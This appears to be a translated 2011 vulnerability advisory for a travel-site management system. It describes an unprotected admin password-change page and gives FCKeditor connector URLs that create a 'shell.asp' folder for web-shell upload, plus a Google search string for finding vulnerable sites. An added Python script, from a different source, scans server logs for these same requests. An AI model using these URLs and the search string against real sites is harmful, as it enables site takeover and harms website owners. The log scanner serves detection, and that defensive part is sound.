Le tour travel site management system v1.7.3 0day - vulnerability warning - the black bar safety net

ID MYHACK58:62201129830
Type myhack58
Reporter Anonymous
Modified 2011-03-22T00:00:00


Vulnerable program: Le tour travel site management system v1.7.3

Affected versions: v1.7.3

Exploit procedure:

First: Admin_Passod.asp in the administrator directory

(Code omitted)

This file is used to change the password, but the author did not put any access restriction on it, so it can be used to change the administrator password. Usage is very simple: request http://www.xxx.com/admin/Admin_Passod.asp

Second: the FCKeditor upload vulnerability. Many programs have recently been seen with this vulnerability.

http://www.xxx.com/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684

http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

The official website is not affected by the first issue: either the admin back-end path was changed, or the file was deleted.

Google search keyword: inurl:Plan_Show.asp?InfoId=
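A defender-side check for the two issues above, as an added example that is not part of the original advisory: it scans web server logs for requests to Admin_Passod.asp and for FCKeditor connector CreateFolder calls whose folder name carries a script extension. The log field layout, the sample lines and the extension list are assumptions constructed for the illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# Assumed field order (IIS W3C style):
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
# Constructed sample lines; IPs and timestamps are illustrative only.
SAMPLE_LOG = """\
2011-03-22 10:01:02 203.0.113.7 GET /admin/Admin_Passod.asp - 200
2011-03-22 10:01:09 203.0.113.7 GET /fckeditor/editor/filemanager/connectors/asp/connector.asp Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z 200
2011-03-22 10:02:00 198.51.100.4 GET /fckeditor/editor/filemanager/connectors/asp/connector.asp Command=GetFolders&Type=Image&CurrentFolder=%2F 200
2011-03-22 10:03:00 198.51.100.4 GET /Plan_Show.asp InfoId=12 200
"""

# Assumed list of extensions the server may execute as script.
SCRIPT_EXT = re.compile(r"\.(asp|asa|cer|cdx|aspx)(/|;|$)", re.I)

def classify(line):
    """Return finding labels for one log line (empty list if nothing matches)."""
    parts = line.split()
    if len(parts) < 7:
        return []
    stem, query = unquote(parts[4]).lower(), parts[5]
    findings = []
    # Match on the file name only: the admin directory may have been renamed.
    if stem.endswith("/admin_passod.asp"):
        findings.append("password-change page requested")
    if "/filemanager/connectors/" in stem:
        # parse_qs percent-decodes values; keys are compared case-insensitively.
        params = {k.lower(): v for k, v in parse_qs(query).items()}
        if params.get("command", [""])[0].lower() == "createfolder":
            names = params.get("currentfolder", []) + params.get("newfoldername", [])
            if any(SCRIPT_EXT.search(n) for n in names):
                findings.append("folder with script extension created via connector")
    return findings

def scan(log_text):
    """Return (client_ip, finding) pairs for every matching log line."""
    hits = []
    for line in log_text.splitlines():
        if line.startswith("#"):  # skip W3C header directives
            continue
        hits.extend((line.split()[2], label) for label in classify(line))
    return hits

if __name__ == "__main__":
    for ip, label in scan(SAMPLE_LOG):
        print(ip, label)
```

Hits on the password-change page still need correlating with authenticated admin sessions, since legitimate administrators request the same file.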